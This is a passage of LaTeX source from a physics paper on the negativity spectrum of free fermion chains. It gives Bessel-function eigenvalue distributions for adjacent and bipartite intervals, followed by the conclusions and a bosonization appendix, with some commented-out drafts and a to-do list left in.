P_1(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)+ \frac{\beta_1}{\xi_1} I_1(2\xi_1) + \frac{\beta_2}{\xi_2} J_1(2\xi_2)+ \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
P_2(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)- \frac{\beta_1}{\xi_1} I_1(2\xi_1) + \frac{\beta_2}{\xi_2} J_1(2\xi_2)- \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
P_3(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)-2 \frac{\beta_1}{\xi_1} I_1(2\xi_1) -2 \frac{\beta_2}{\xi_2} J_1(2\xi_2)+ \frac{\beta_3}{\xi_3} J_1(2\xi_3)],
\end{align}
and
\begin{align}
n_0(\lambda)& =\frac{1}{6} [I_0(2\xi_0)+ 2I_0(2\xi_1)
+2J_0(2\xi_2)+ J_0(2\xi_3)], \\
n_1(\lambda)& =\frac{1}{6} [I_0(2\xi_0)+ I_0(2\xi_1)
-J_0(2\xi_2)- J_0(2\xi_3)], \\
n_2(\lambda)& =\frac{1}{6} [I_0(2\xi_0)-I_0(2\xi_1)
-J_0(2\xi_2)+ J_0(2\xi_3)], \\
n_3(\lambda)& =\frac{1}{6} [I_0(2\xi_0)-2I_0(2\xi_1)
+2J_0(2\xi_2) -J_0(2\xi_3)],
\end{align}
\fi
\begin{figure}
\center
\includegraphics[scale=0.6]{adj_branch_2}
\caption{\label{fig:nl_OpOp}
Spectrum of eigenvalues of ${\rho^{T_A}} $ with a certain complex phase (c.f.~Fig.~\ref{fig:rT_spec}(a)) for two equal intervals on an infinite chain.
Solid lines are the prediction in Eq.~\eqref{eq:T_ns_adj}.
Dots are numerics, with different colors corresponding to different subsystem sizes. We use the same numerical procedure as in Fig.~\ref{fig:rT_spec} to obtain few thousand largest (in modulus) many-body eigenvalues from a truncated set of single particle eigenvalues.}
\end{figure}
We can further derive the distribution of eigenvalues along different branches in Fig.~\ref{fig:rT_spec}(a). The idea is to analytically continue ${Z}_{{\cal N}_n}^{({\rm ns})}$ with $n=6N+m$ to arbitrary $n$ and solve the resulting four linearly independent equations generated by (\ref{eq:Zns_spec}) to obtain the moments $\sum_{j} |\lambda_{s_j}|^n$ for each $s=0,\cdots,3$. This calculation relies on the assumption that $\lim_{n\to\infty} \frac{c_n}{n}$
does not depend on $m$, which is indeed the case in (\ref{eq:ns_adj_cn}). Hence, we arrive at
\begin{subequations}
\begin{align}
\label{eq:P_ns_adj}
P_\alpha(\lambda)& =\delta(\lambda_M-\lambda)\delta_{\alpha0} + \frac{b \theta(\lambda_M-|\lambda|)}{6|\lambda|\xi} \sum_{\beta=1}^2[M_{\alpha\beta} a_\beta I_1(2a_\beta\xi)- \widetilde M_{\alpha\beta} \tilde a_\beta J_1(2 \tilde a_\beta\xi)],\\
\label{eq:T_ns_adj}
n_\alpha(\lambda)& =\frac{1}{6} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} I_0(2 a_\beta\xi)+ \widetilde M_{\alpha\beta} J_0(2\tilde a_\beta \xi) \right],
\end{align}
\end{subequations}
where $P_\alpha(\lambda)$ and $n_\alpha(\lambda)$, $\alpha=0,\cdots, 3$ describe the distribution of eigenvalues along the $\angle\lambda=\alpha\pi/3$ branch.
Here, $M$ and $\widetilde M$ encapsulate the coefficients
\begin{align}
(M| \widetilde M)=
\left(\begin{array}{cc|cc}
1 & 2 &2 & 1 \\
1 & 1 &-1 & -1 \\
1 & -1 & -1 & 1 \\
1 & -2 & 2 & -1
\end{array}
\right),
\end{align}
$(a_1,a_2, \tilde a_1,\tilde a_2)=(\sqrt{\frac{3}{2}},1 , \frac{1}{\sqrt{2}}, \sqrt{3})$,
\iffalse
\begin{align}
a_1&=\frac{3}{2}b +\frac{1}{6}\ln2,
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
a_2 = b,
\\
\tilde a_1 &=\frac{1}{2}b +\frac{1}{18}\ln2,
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\tilde a_2 =3b +\frac{1}{3} \ln2,
\end{align}
\fi
and $\xi$ and $b$ are defined in Eqs.~(\ref{eq:xi_ns}) and (\ref{eq:lmax_ns_adj}), respectively.
Several comments regarding the phase-resolved distributions (\ref{eq:P_ns_adj}) and (\ref{eq:T_ns_adj}) are in order. The largest eigenvalue $\lambda_M>0$ is located on the real axis and hence only appears in $P_0(\lambda)$. The distribution of modulus is found by $(P_0+2P_1+2P_2+P_3)$ which reproduces (\ref{eq:P_ns_abs}).
It is easy to check that the distribution is normalized and consistent with the identity $\text{Tr}{\rho^{T_A}} =1$,
\begin{align}
\label{normalization}
\int \lambda P(\lambda) d\lambda &=
\int \lambda [P_0(\lambda)+P_1(\lambda)-P_2(\lambda)-P_3(\lambda)] d\lambda \nonumber \\
&= \int_0^{\lambda_M} \lambda [\delta(\lambda_M-\lambda)+\frac{a_2}{\lambda \xi_2} I_1(2\xi_2)] d\lambda =1.
\end{align}
It is also possible to study the scaling of the maximum eigenvalue (in modulus) $|\lambda_M|$ along each branch.
For the bosonic negativity, there are only two
branches (positive and negative real axis) and it was found that the scaling
of the maxima is the same in the
thermodynamic limit~\cite{Ruggiero_2}.
In our case, for a given branch (labeled by $\alpha$) the maximum $|\lambda_M^{\alpha}|$ (with $|\lambda^{0}_M| \equiv \lambda_M$) can be extracted as
\begin{equation}
\label{maximum}
\ln |\lambda_{M}^{(\alpha)}| = \lim_{n \to \infty} \frac{1}{n} \ln \sum_{j} |\lambda_j^{(\alpha)}|^n = -b
\end{equation}
where the result is independent of $\alpha$. This again implies the same scaling along each branch, up to a possible unknown constant due to non-universal coefficient that we are dropping in the above formulas (see Eq.~\eqref{eq:Rn_cft}).
We compare the analytical results with the numerical simulations for each branch in Fig.~\ref{fig:nl_OpOp}. As expected, the numerical spectra reach the continuum field theory calculations as we make the system larger. We should point out that in contrast with the bosonic negativity spectrum and the entanglement spectrum which are given solely in terms of $I_\alpha(x)$, the modified Bessel function of the first kind, here the fermionic negativity spectrum contains the Bessel functions $J_\alpha(x)$ as well. Recall that unlike
$I_\alpha(x)$ which is strictly positive for $x>0$, $J_\alpha(x)$ does oscillate between positive and negative values. Nevertheless, there is no issue in $P_\alpha(\lambda)$ which has to be non-negative, as the linear combinations of $I_\alpha$ and $J_\alpha$ in (\ref{eq:T_ns_adj}) are such that they are strictly positive over their range of applicability within each branch.
\subsubsection{Bipartite geometry}
\begin{figure}
\center
\includegraphics[scale=0.7]{bi_branch_2}
\caption{\label{fig:nl_ns_bi}
Spectrum of modulus of eigenvalues of ${\rho^{T_A}} $ for bipartite geometry along the real and imaginary axes.
The total system size is $L=2\ell$ for each $\ell$.
Solid lines are the prediction in Eq.~\eqref{eq:T_ns_adj2}.
Dots are numerics, with different colors corresponding to different subsystem sizes.
A numerical procedure similar to that of Fig.~\ref{fig:rT_spec} is used to obtain few thousand largest (in modulus) many-body eigenvalues from a truncated set of single particle eigenvalues.
}
\end{figure}
Here, we consider two intervals which make up the entire system as shown in the upper panel of Fig.~\ref{fig:Zns_vs_l}(b). In this case, the branch points are identified pairwise as $u_A=v_B$ and $v_A=u_B$, where $\ell_1=v_A-u_A$.
The partition functions in momentum space are found to be
\begin{align}
Z_{k,n}^{(\text{ns})}=\left\{ \begin{array}{lll}
\ell_1^{-8\frac{k^2}{n^2}} & & \left|k/n\right|< 1/4, \\
\ell_1^{-2(2|\frac{k}{n}|-1)^2} & & \left|k/n\right|> 1/4.
\end{array} \right.
\label{eq:Z_NS_bi}
\end{align}
Similar to the adjacent intervals, the discontinuity in the $k$-dependence comes from the $2\pi$ ambiguity of the $U(1)$ monodromy (Appendix~\ref{app:bosonization}). As a result, we have ${\cal N}_n^{({\rm ns})}= c_n \ln (\ell_1)+\cdots $
where
\begin{align}
\label{eq:ns_bi}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n- \frac{4}{n} \right) &\ \ \ \ \ n=4N, \\
-\frac{1}{6} \left( n- \frac{1}{n} \right) & \ \ \ \ \ n=2N+1, \\
-\frac{1}{6} \left( n+ \frac{8}{n} \right) &\ \ \ \ \ n=4N+2. \
\end{array}
\right.
\end{align}
A benchmark of these expressions against the scaling of RN in numerical simulations is shown in Fig.~\ref{fig:nl_ns_bi}(c).
Because of the cyclic analyticity of the ${\cal N}_n^{({\rm ns})}$ modulo four, we expect to have the many-body eigenvalues along the real and imaginary axes. In other words, the complex phase of eigenvalues are multiples of $2\pi/4$.
We now derive the complex phase structure of many-body eigenvalues from the single particle spectrum.
In the current case, the density matrix is pure leading to the identity $\gamma^2=\mathbb{I}$ for the covariance matrix.
This property implies that the spectrum of the transformed covariance matrix (\ref{eq:metal_pt}) can be fully determined by the covariance matrix associated to the subsystem A, i.e., $\gamma_{AA}$ in Eq.~(\ref{eq:metal_pt}). Hence, the single particle eigenvalues are given by
\begin{align}
\nu_k= \mu_k + i \sqrt{1-\mu_k^2},
\end{align}
and its Hermitian conjugate for $\nu_k^\ast$, where $\mu_k$'s ($k=0,\cdots, N_A$) denote the eigenvalues of $\gamma_{AA}$~\cite{Eisler2015}. Using (\ref{eq:mb_eigs}), the many-body eigenvalues can be written as
\begin{align}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}= \prod_{\sigma_k=\sigma_k'}
\frac{1+\sigma_k \mu_k}{2}
\prod_{\sigma_k=-\sigma_k'} \frac{\sigma_k i \sqrt{1-\mu_k^2}}{2}.
\end{align}
This decomposition has two types of factors: real positive and pure imaginary.
Therefore, the many-body eigenvalues manifestly lie on the real and imaginary axes.
Moreover, the many-body spectrum contains pairs of pure imaginary eigenvalues $\pm i\lambda_j$. The real negative eigenvalues are also two-fold degenerate since they are obtained from the product of even number of pure imaginary factors. In contrast, the real positive eigenvalues are not necessarily degenerate.
As a result, the moments of ${\rho^{T_A}} $ take now the following form
\begin{align}
\label{eq:Zns_spec_bi}
{Z}_{{\cal N}_n}^{({\rm ns})} &= \sum_j \lambda_{0j}^n
+2\cos\left(\frac{\pi n}{2}\right) \sum_j |\lambda_{1j}|^n
+ \cos\left(n\pi\right) \sum_j |\lambda_{2j}|^n,
\end{align}
where $\{\lambda_{\alpha j}\}, \alpha=0,1,2$ denote the eigenvalues along $\angle\lambda= \alpha\pi/2$. This expression in turn implies that there are three types of combinations of different branches for all $n$, which is again consistent with (\ref{eq:ns_bi}). By analytically continuing the three cases, we derive the moment $\sum_j |\lambda_{\alpha j}|^n$ for each branch. The resulting distributions are found to be
\begin{subequations}
\begin{align}
P_\alpha(\lambda)& =\delta(\lambda_M-\lambda)\delta_{\alpha0} + \frac{ b \theta(\lambda_M-|\lambda|)}{4|\lambda|\xi} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} a_\beta I_1(2a_\beta\xi) - \widetilde M_{\alpha} \tilde a J_1(2 \tilde a\xi) \right],\\
\label{eq:T_ns_adj2}
n_\alpha(\lambda)& =\frac{1}{4} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} I_0(2 a_\beta\xi)+ \widetilde M_{\alpha} J_0(2\tilde a \xi) \right],
\end{align}
\end{subequations}
where $M$ and $\widetilde M$ encode the coefficients
\begin{align}
(M| \widetilde M)=
\left(\begin{array}{cc|c}
1 & 2 & 1 \\
1 & 0 & -1 \\
1 & -2 & 1
\end{array}
\right),
\end{align}
$(a_1, a_2, \tilde{a})= (2, 1, 2 \sqrt{2}) $ and $\xi$ is defined in (\ref{eq:xi_ns}) with $b=-\ln\lambda_M=\frac{1}{6}\ln \ell$. As shown in Fig.~\ref{fig:nl_ns_bi}, the above formulas are in decent agreement with numerical results.
Also in this case the maximum (in modulus) $|\lambda_M^{\alpha}|$ along the different branches can be evaluated through Eq.~\eqref{maximum}, giving (up to an unknown non-universal constant) $\ln |\lambda_M^{\alpha}| = -b$ independent of $\alpha$.
Finally, also for the bipartite geometry, a consistency check is obtained from ${\rm Tr} \rho^{T_A}=1$, which simply follows from a calculation analogous to Eq.~\eqref{normalization}.
\subsection{Spectrum of $\rho^{\widetilde{T}_A}$ }
Again, the first step to find the moments
is the momentum decomposition of (\ref{eq:pTR_R}), yielding
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z^{(\text{r})}_{k,n},
\end{align}
where the partition function
\begin{align} \label{eq:ZRk_R}
Z^{(\text{r})}_{k,n} = \braket{ {\widetilde{\cal T}}_{k,n} ^{-1}(u_A) {\widetilde{\cal T}}_{k,n} (v_A) {\cal T}_{k,n}(u_B) {\cal T}_{k,n}^{-1} (v_B)}.
\end{align}
is subject to modified monodromy conditions for the $ {\widetilde{\cal T}}_{k,n} $ and $ {\widetilde{\cal T}}_{k,n} ^{-1}$, which are $\psi_k\mapsto e^{\pm i(2\pi k/n-\pi)} \psi_k$. This monodromy is different from the supersymmetric trace~\cite{Giveon2016} (see Appendix~\ref{app:susy} for the definition and more details).
\subsubsection{Adjacent intervals}
In this case, we find that
\begin{align}
\label{eq:Z_R_ad}
Z^{(\text{r})}_{k,n}\propto& \ \ell_1^{-2(|\frac{k}{n}|-\frac{1}{2})(|\frac{2k}{n}|-\frac{1}{2})}
\cdot \ell_2^{-2|\frac{k}{n}|(|\frac{2k}{n}|-\frac{1}{2})}
\cdot (\ell_1+\ell_2)^{2|\frac{k}{n}|(|\frac{k}{n}|-\frac{1}{2})}.
\end{align}
It is important to note that for $k<0$, we modified the flux at $u_1$ and $v_1$ by inserting additional $2\pi$ and $-2\pi$ fluxes, respectively, where the scaling exponent takes its minimum value (c.f.~Appendix~\ref{app:bosonization}).
Summing up $Z^{(\text{r})}_{k,n}$ terms, we get
\begin{align} \label{eq:R_adjacent}
{\cal N}_n^{({\rm r})}
&= c^{(1)}_n \ln (\ell_1)+ c^{(2)}_n \ln (\ell_2)
+ c^{(3)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n_o} &= -\frac{1}{12} \left( n_o+ \frac{5}{n_o} \right), \\
c^{(2)}_{n_o} =c^{(3)}_{n_o} &= -\frac{1}{12} \left( n_o- \frac{1}{n_o} \right),
\label{eq:cn3_o}
\end{align}
for odd $n=n_o$, and
\begin{align}
c^{(1)}_{n_e}=c^{(2)}_{n_e} & = -\frac{1}{6} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right), \\
c^{(3)}_{n_e} &= -\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right),
\label{eq:cn3_e}
\end{align}
for even $n=n_e$.
As a consistency check, we show in Appendix~\ref{app:moments} that the above formulae can be derived from two disjoints intervals as the distance between the intervals is taken to be zero.
Notice that the even $n$ case is identical to the general CFT results~\cite{Calabrese2013}.
Also, from (\ref{eq:anal_cont_f}) we arrive at the familiar result for the logarithmic negativity,
\begin{align} \label{eq:cleanCFT}
{\cal E} = \frac{1}{4} \ln \left( \frac{\ell_1\ell_2}{\ell_1+\ell_2} \right) + \cdots
\end{align}
For equal length intervals, we may write ${\cal N}_n^{({\rm r})}=c_n \ln \ell+ \cdots$ where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{4} \left( n_o+ \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{2} \left( \frac{{n_e}}{2}- \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\begin{figure}
\center
\includegraphics[scale=0.7]{adj_pm}
\caption{\label{fig:nl_OpOm}
Tail distribution function for the spectrum of $\rho^{\widetilde{T}_A}$ of two equal adjacent intervals on an infinite chain.
Solid lines are the analytical distributions from Eq.~\eqref{eq:T_tilde_adj}.
Dots are numerics, with different colors corresponding to different subsystem sizes.
We use the same numerical procedure as in Fig.~\ref{fig:rT_spec} to obtain few thousand largest (in modulus) many-body eigenvalues from a truncated set of single particle eigenvalues.
}
\end{figure}
As expected for Hermitian operator $\rho^{\widetilde{T}_A}$, here the moments ${\cal N}_n^{({\rm r})}$ only depend on parity of $n$, i.e., whether $n$ is odd or even. This means that the eigenvalues are real positive or negative. We can also see this from the fact that the single particle spectrum is real.
The many-body eigenvalues follow the form
$\lambda_{\boldsymbol{\sigma}}= \prod_{\sigma_k=\pm}
(1+\sigma_k \nu_k)/2$,
where $\nu_k$ are single-particle eigenvalues of the covariance matrix (\ref{eq:cov_pTd}).
As discussed in the previous section, we carry out the same procedure to derive the distribution from analytic continuation of moments (in this case there are only two branches). The final result reads
\begin{subequations}
\begin{align}
P(\lambda) &=\delta(\lambda_M-\lambda)+ \frac{b\theta(\lambda_M-|\lambda|)}{2|\lambda|\xi} [- J_1 (2 \xi) \text{sgn}(\lambda)+\sqrt{2} I_1 (2\sqrt{2} \xi) ], \\
\label{eq:T_tilde_adj}
n(\lambda) &= \frac{1}{2} [J_0 (2 \xi) \text{sgn}(\lambda)+I_0 (2\sqrt{2} \xi) ],
\end{align}
\end{subequations}
where $\xi$ obeys the same form as Eq.~(\ref{eq:xi_ns}) with a slight difference that
$b=-\ln\lambda_M=\frac{1}{4}\ln \ell$.
We present a comparison of the above expression with numerical spectrum of free fermions on the lattice of different lengths in Fig~\ref{fig:nl_OpOm}. There is a good agreement between analytical and numerical results.
We further find that, as it was the case for the bosonic negativity, the scaling of the minimum and maximum eigenvalue is the same.
Finally, we confirm that the distribution probability is properly normalized such that $\int \lambda P(\lambda) d\lambda=\text{Tr}[\rho(-1)^{F_A}]$ and it is consistent with $\mathcal{E} = \frac{1}{4}\ln\ell$, Eq.~\eqref{eq:anal_cont_f}, which follows from
\begin{equation}
\mathcal{E} = \ln \int d \lambda \, |\lambda| P (\lambda) = \ln \left[ \lambda_M + \int_{0}^{\lambda_M} d \lambda \, \frac{b \sqrt{2}}{\xi} I_1 (2 \sqrt{2} \xi) \right] =
\frac{1}{4}\ln \ell.
\end{equation}
\subsubsection{Bipartite geometry}
In this case, we start by computing the correlator
\begin{align} \label{eq:b_ZRk_R}
Z^{(\text{r})}_{k,n}
= \braket{ {\cal Q}_{k,n}^{-2}(u_A) {\cal Q}_{k,n}^2(v_A) } \propto \ell_1^{-2(|\frac{2k}{n}|-\frac{1}{2})^2}.
\end{align}
Here again, we have to minimize the scaling exponent for $k<0$ by inserting additional $2\pi$ fluxes (c.f.~Appendix~\ref{app:bosonization}).
The RN is then found to be ${\cal N}_n^{({\rm r})}= c_n \ln (\ell_1) + \cdots$ where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o+ \frac{2}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{3} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
From this, we derive the distribution of many-body eigenvalues to be
\begin{subequations}
\begin{align}
P(\lambda) &=\delta(\lambda_M-\lambda)+\frac{b\theta(\lambda_M-|\lambda|)}{2|\lambda|\xi} [-\sqrt{2} J_1 (2\sqrt{2} \xi) \text{sgn}(\lambda)+ 2 I_1 (4 \xi) ], \\
n(\lambda) &= \frac{1}{2} [ J_0 (2\sqrt{2} \xi) \text{sgn}(\lambda)+ I_0 (4 \xi) ],
\end{align}
\end{subequations}
where $\xi$ is given in (\ref{eq:xi_ns}) and $b=-\ln\lambda_M=\frac{1}{6}\ln \ell$.
We finish this part by a remark about the covariance matrix.
Using the fact that $\gamma^2=\mathbb{I}$ for pure states, the covariance matrix (\ref{eq:cov_pTd}) can be further simplified into
\begin{align}
\widetilde\gamma =\left( \begin{array}{cc}
\gamma_{AA}-2\gamma_{AA}^{-1} & -i\gamma_{AB} \\
i\gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
Similar to the adjacent intervals, we can calculate the many-body spectrum out of eigenvalues of the above covariance matrix.
We confirm that the numerical results and analytical expressions match. However, we avoid showing the plots here as they look quite similar to Fig.~\ref{fig:nl_OpOm}.
\section{Conclusions}
\label{sec:conclusions}
In summary, we study the distribution of the eigenvalues of partially transposed density matrices, aka the negativity spectrum, in free fermion chains.
Taking the PT of fermionic density matrices is known to be a difficult task even for free fermions (or Gaussian states). However, recent studies~\cite{Shap_unoriented,Shiozaki_antiunitary,Shap_pTR} suggest that this difficulty could be circumvented if we use a different definition for partial transpose which is closely related to time-reversal transformation. In a matrix representation of a fermionic density matrix, e.g. in Fock space basis, the latter operation involves multiplying a $\mathbb{Z}_4$ complex phase factor in addition to the matrix transposition where the phase factor solely depends on the fermion-number parity of the state of subsystems to be exchanged in the transpose process.
It turned out that the phase factor in the fermionic partial transpose lead to two types of partial transpose operation ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$.
The difference is that ${\rho^{T_A}} $ is pseudo-Hermitian
and may contain complex eigenvalues, while $\rho^{\widetilde{T}_A}$ is Hermitian and its eigenvalues are real.
This is in contrast with the fact that the standard partial transpose ${\rho^{T_A}} $ is always a Hermitian operator which implies a real spectrum.
In this paper, we presented analytical and numerical results for the negativity spectra using both types of fermionic partial transpose. In the case of $\rho^{\widetilde{T}_A}$, we find that the negativity spectra share a lot of similarities with those found in a previous CFT work~\cite{Ruggiero_2}. However, in the case of ${\rho^{T_A}} $, we realize that the eigenvalues form a special pattern on the complex plane and fall on six branches with a {quantized} phase of $2\pi n/6$. The spectrum in the latter case is mirror symmetric with respect to the real axis, and there are four universal functions which describe the distributions along the six branches.
The sixfold distribution of eigenvalues is not specific to complex fermion chain (described by the Dirac Hamiltonian) with $c=1$ and also appears in the critical Majorana chain with $c=1/2$. We further confirmed that our analytical expressions are applicable to the Majorana chain upon modifying the central charge $c$.
Given our free fermion results in one dimension, there are several avenues to pursue for future research.
A natural extension is to explore possible structures in the negativity spectrum of free fermions in higher dimensions.
It would also be interesting to understand the effect of disorder and spin-orbit coupling on this distribution. In particular, the random singlet phase (RSP)~\cite{Refael2004}, which can be realized in the strongly disordered regime of one-dimensional free fermions, is characterized by logarithmic entanglement entropy~\cite{Laflorencie2005,Fagotti2011,Ruggiero_1} that is a hallmark of $(1+1)$d critical theories. An interesting question is how the negativity spectrum of critical RSP differs from the clean limit which was studied in this paper. Another direction could be studying strongly correlated fermion systems and specially interacting systems which have a description in terms of projected free fermions such as the Haldane-Shastry spin chain~\cite{HS-Haldane,HS-Shastry}. Furthermore, it is worth investigating how thermal fluctuations affect the negativity spectrum in finite-temperature states. Finally, the negativity spectrum may be useful in studying the quench dynamics and shed light on thermalization.
\iffalse
Symmetry resolved
Anyons
Disjoint
Contour
{\bf To do list}
\begin{itemize}
\item Polish text and appendices
\item Check the logical flow
\item Add more texts, consistency checks, etc.
\item Disjoint intervals $\checkmark$
\item Include cases when $k/n=1/3$ $\checkmark$
\item Numerically compute $n(\lambda)$ $\checkmark$
\item Numerics: which quantities should we compute?
\item Extension to (symmetry resolved entanglement) Sela, Goldstein results
\item In the limit of bipartition, consider the difference in $\mathcal{Z}_n^{(\text{ns})}$ due to spatial BC \textbf{[HS: No dependence, besides the fact that the spectrum for periodic BC is degenerate at half filling.]}
\item Compute $Z_n$ as a function of twist $\theta$ and show the non-analyticity [Belin-Matsuura]
\item (?) General result for arbitrary number of intervals
\end{itemize}
\fi
\section*{Acknowledgments}
The authors would like to acknowledge insightful discussions with Erik Tonni, David Huse, Zoltan Zimboras.
\paragraph{Funding information}
SR and HS were supported in part by the National Science Foundation under Grant No.\ DMR-1455296,
and under Grant No.\ NSF PHY-1748958.
PC and PR acknowledge support from ERC under Consolidator grant number 771536 (NEMO).
We all thank the Galileo Galilei Institute for Theoretical Physics for the hospitality and the INFN for partial support during the completion of this work.
H.S. acknowledges the support from the ACRI fellowship (Italy) and the KITP graduate fellowship program.
SR is supported by a Simons Investigator Grant from the Simons Foundation.
\begin{appendix}
\section{\label{app:bosonization} Twist fields, bosonization, etc.}
The R\'enyi entanglement entropy (REE) of a reduced density matrix $\rho$ is defined in Eq.~(\ref{eq:Rn_def}).
For non-interacting systems with conserved $U(1)$ charge, we can transform the trace formulas into a product of $n$ decoupled partition functions.
Let us first illustrate this idea for REE~\cite{Casini2005}. We can diagonalize the twist matrix $T$ in Eq.~(\ref{eq:Tmat}) and rewrite the REE in terms of $n$-decoupled copies,
\begin{align}
Z_{{\cal R}_n} =& \int \prod_k d\psi_k d\bar \psi_k \ \prod_k \left[ \rho(\bar\psi_k,\psi_k)\right] e^{\sum_{k} \lambda_k \bar\psi_{k} \psi_k },
\end{align}
where $\lambda_k=e^{i 2\pi \frac{k}{n}}$ for $k=(n-1)/2,\cdots,(n-1)/2$ are eigenvalues of the twist matrix. In this new basis, the transformation rule $\Psi\to T\Psi$ for the field passing through the interval becomes a phase twist, i.e., $\psi_k \mapsto \lambda_k \psi_k$. Therefore, the REE can be decomposed into product of separate factors as
\begin{align}
Z_{{\cal R}_n} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z_{k,n},
\end{align}
where $Z_{k,n}$ is the partition function containing an interval with the twisting phase $2\pi k/n$.
We reformulate the partition function in the presence of phase twisting intervals in terms of a theory subject to an external gauge field which is a pure gauge everywhere (except at the points $u_{i}$ and
$v_{i}$ where it is vortex-like).
This is obtained by a singular gauge transformation
\begin{equation}
\psi_{k}(x)\to e^{i\int_{x_{0}}^{x}dx^{{\prime }\mu }A_{\mu }^{k}(x^{{\prime }})}\psi
_{k}\left( x\right),
\end{equation}
where $x_{0}$ is an arbitrary fixed point. Hence, for a subsystem made of $p$ intervals, $A = \bigcup_{i=1}^p [u_i, v_i]$, we can absorb the boundary conditions across the intervals into an external gauge field and the resulting Lagrangian density becomes
\begin{align} \label{eq:gauged_dirac}
{\cal L}_{k}=\bar{\psi}_{k}\gamma ^{\mu }\left( \partial _{\mu }+i\,A^k_{\mu}\right) \psi_{k}.
\end{align}
where the $U(1)$ flux is given by
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{\mu }^{k}(x)=2\pi \frac{k}{n}
\sum_{i=1}^{p}\big[ \delta (x-u_{i})-\delta (x-v_{i})\big] \,. \label{eq:bRenyi}
\end{align}
Note that there is an ambiguity in the flux strength, namely, $2\pi
m$ (integer $m$) fluxes may be added to the right hand side of the above expression, while the monodromy for the fermion fields does not change. To preserve this symmetry (or redundancy), $Z_k$ must be written as a sum over all representations~\cite{Jin2004,Calabrese_gfc,Abanov,Ovchinnikov}.
The asymptotic behavior of each term in this expansion is a power law $\ell^{-\alpha_m}$ in thermodynamic limit (large (sub-)system size).
Here, we are interested in the leading order term which corresponds to the smallest exponent $\alpha_m$.
As we will see in the case of entanglement negativity, we need to consider $m\neq 0$ for some values of $k$.
Let us first discuss this expansion for a generic case.
Let ${\cal S}_n$ be a partition function on a multi-sheet geometry (for either R\'enyi entropy or negativity). As mentioned, after diagonalizing the twist matrices ${\cal S}_n$ can be decomposed as
\begin{align}
{\cal S}_n= \sum_{k} \ln Z_k,
\end{align}
where $Z_k$ is the partition function in the presence of $2p$ flux vortices at the two ends of $p$ intervals between $u_{2i-1}$ and $u_{2i}$, that is
\begin{equation}
Z_{k}=\left\langle e^{i\int A_{k,\mu } j_{k}^{\mu }d^{2}x}\right\rangle \,,
\end{equation}
in which
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{k,\mu }(x)=2\pi
\sum_{i=1}^{2p} \nu_{k,i} \delta (x-u_{i}) \,,
\end{align}
and $2\pi \nu_{k,i}$ is vorticity of gauge flux determined by the eigenvalues of the twist matrix.
The total vorticity satisfies the neutrality condition $\sum_i \nu_{k,i}=0$ for a given $k$.
In order to obtain the asymptotic behavior, one needs to take the sum over all the representations of $Z_k$ (i.e., flux vorticities mod $2\pi$),
\begin{align}
{Z}_k= \sum_{\{m_i\}} Z_k^{(m)}
\end{align}
where $\{m_i\}$ is a set of integers and
\begin{equation}
Z^{(m)}_{k}=\left\langle e^{i\int A_{k,\mu }^{(m)}j_{k}^{\mu }d^{2}x}\right\rangle \,,
\end{equation}
is the partition function for the following fluxes,
\begin{align}
\epsilon ^{\mu \nu }\partial _{\nu}A_{\mu }^{(m), k}(x)=2\pi
\sum_{i=1}^{2p} \widetilde\nu_{k,i} \delta (x-u_{i}),
\end{align}
and $\widetilde\nu_{k,i}=\nu_{k,i}+ m_i$ are shifted flux vorticities.
The neutrality condition requires $\sum_{i} m_{i}=0$. Using the bosonization technique, we obtain
\begin{align}
Z_k^{(m)} = C_{\{m_i\}} \prod_{i<j} |u_i-u_j|^{2\widetilde\nu_{k,i}\widetilde\nu_{k,j}},
\end{align}
where $C_{\{m_i\}}$ is a constant depending on cutoff and microscopic details. We make use of the neutrality condition $-2\sum_{i<j} \widetilde\nu_{k,i}\widetilde\nu_{k,j} = \sum_{i} \widetilde\nu_{k,i}^2$ and rewrite
\begin{align}
Z_k &\sim \sum_{\{m_i\}} C_{\{m_i\}}\ \ell^{2\sum_{i<j} \widetilde\nu_{k,i}\widetilde\nu_{k,j} }
= \sum_{\{m_i\}} C_{\{m_i\}}\ \ell^{-\sum_{i} \widetilde\nu_{k,i}^2 }
\label{eq:scaling}
\end{align}
where $\ell$ is a length scale.
From this expansion, the leading order term in the limit $\ell\to \infty$ is clearly the one(s) which minimizes the quantity $\sum_{i} \widetilde\nu_{k,i}^2$. This is identical to the condition derived from the generalized Fisher-Hartwig conjecture~\cite{BasTr,Basor1979}.
A careful determination of the leading order term for REE by a similar approach was previously discussed in Ref.~\cite{Calabrese_gfc,Abanov,Ovchinnikov}.
